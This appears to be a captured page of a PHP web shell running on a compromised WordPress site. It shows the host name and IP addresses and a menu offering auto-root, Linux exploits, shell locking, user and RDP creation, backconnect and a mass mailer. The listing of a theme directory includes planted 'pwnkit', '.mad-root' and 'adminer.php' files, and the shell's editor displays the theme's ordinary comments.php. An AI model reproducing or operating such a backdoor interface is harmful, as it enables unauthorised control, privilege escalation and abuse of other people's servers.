Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.217.120
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
andre-lite /
[ HOME SHELL ]
Name
Size
Permission
Action
genericons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
404.php
432
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
animate.css
37.64
KB
-rw-r--r--
archive.php
755
B
-rw-r--r--
comments.php
1.92
KB
-rw-r--r--
content.php
519
B
-rw-r--r--
footer.php
903
B
-rw-r--r--
functions.php
4.6
KB
-rw-r--r--
header.php
2.01
KB
-rw-r--r--
index.php
588
B
-rw-r--r--
page.php
922
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.07
KB
-rw-r--r--
screenshot.png
382.22
KB
-rw-r--r--
search.php
792
B
-rw-r--r--
sidebar.php
212
B
-rw-r--r--
single.php
1.36
KB
-rw-r--r--
style-editor.css
3.82
KB
-rw-r--r--
style-rtl.css
40.86
KB
-rw-r--r--
style.css
40.75
KB
-rw-r--r--
template-home-page.php
435
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template for displaying Comments. * * @package andre-lite */ if ( post_password_required() ) { return; } ?> <div id="comments" class="comments-area"> <?php // You can start editing here -- including this comment! ?> <?php if ( have_comments() ) : ?> <h2 class="comments-title"> <?php $comments_number = get_comments_number(); if ( '1' === $comments_number ) { /* translators: %s: post title */ printf( esc_html( _x( 'One Reply to “%s”', 'comments title', 'andre-lite' ) ), wp_kses_post( get_the_title() ) ); } else { printf( /* translators: 1: number of comments, 2: post title */ esc_html( _nx( '%1$s Reply to “%2$s”', '%1$s Replies to “%2$s”', $comments_number, 'comments title', 'andre-lite' ) ), esc_html( number_format_i18n( $comments_number ) ), wp_kses_post( get_the_title() ) ); } ?> </h2> <ol class="commentlist"> <?php wp_list_comments(); ?> </ol> <!-- .commentlist --> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <nav id="comment-nav-below" class="navigation" role="navigation"> <h1 class="assistive-text section-heading"> <?php esc_html_e( 'Comment navigation', 'andre-lite' ); ?> </h1> <div class="nav-previous"> <?php previous_comments_link( esc_html__( '← Older Comments', 'andre-lite' ) ); ?> </div> <div class="nav-next"> <?php next_comments_link( esc_html__( 'Newer Comments →', 'andre-lite' ) ); ?> </div> </nav> <?php endif; // check for comment navigation. ?> <?php /* If there are no comments and comments are closed, let's leave a note. * But we only want the note on posts and pages that had comments in the first place. */ if ( ! comments_open() && get_comments_number() ) : ?> <p class="nocomments"> <?php esc_html_e( 'Comments are closed.', 'andre-lite' ); ?> </p> <?php endif; ?> <?php endif; ?> <?php comment_form(); ?> </div>
Close